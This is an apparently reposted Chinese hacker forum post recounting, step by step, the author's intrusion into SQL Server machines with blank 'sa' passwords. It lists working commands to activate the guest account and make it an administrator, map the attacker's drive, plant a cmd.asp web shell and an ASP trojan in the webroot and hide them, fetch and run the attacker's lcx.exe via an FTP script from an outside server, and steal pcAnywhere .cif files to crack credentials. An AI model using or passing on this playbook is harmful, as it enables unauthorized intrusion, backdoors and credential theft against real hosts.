| 关键词: nbsp 肉鸡 命令 本机 海阳 流光 成功 木马 顶端 密码 |
前言,这是我两天入侵两台sa空密码主机的真实总结: 1.如何找到sa空密码肉鸡?自己用流光扫吧。 2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。 3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘 4.用supersqlexec联接成功。在命令行中输入: net user guest /active:yes (>指肉鸡显示下同)The command completed successfully. net user guest 123456 > The command completed successfully net localgroup administrators guest /add > The command completed successfully. 这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。 5.心中暗喜,下一步启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。 6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开ipc$? 7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思 不得其解。我后来换wn2000的cmd下net use \ipipc$ "123456" /user:"guest"也不能联接成功。 8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip 9.回到sqlexe命令行中net use x: \本机ipf,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器显 示命令成功完成。 10.sqlexe命令行中运行set得知其主页位置在d:inetpubwwwroot。不错,服务器支持asp.你如果看不懂这个 命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。 11.sqlexe命令行中copy x:cmd.asp d:inetpubwwwroot 12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。md d:inetpubwwwrootaspmm 13.sqlexec命令行中copy x:海阳顶端网木马*.* d:inetpubwwwrootaspmm.再将目录隐藏attrib +h d:inetpubwwwrootaspmm 14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。试一下ftp上传。先将自己的文件lcx.exe上传 到个人主页空间。 15.在自己本机上建立up.txt内容如下: open ftp1.go.163.com(我用得是网易ftp) username(你的上传用户名) password(密码) get lcx.exe(你要上传到肉鸡的文件名) bye(退出ftp) 通过映射copy到肉鸡的c:up.txt 16.sqlexec命令行中ftp -s:c:up.txt等一会你就看到lcx.exe已经在肉鸡在winntsystem32下了。 17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气不好 ,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。 18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢? 19.通过一天的dos8.3规则的补习才知应是这样 :copyc:winntProfilesalluse~1applic~2symantecpcanyw~1*.cif d:inetpubwwwroot.然后通过 ie下载。 20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可以 激活不知什么原因,望高手指点。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|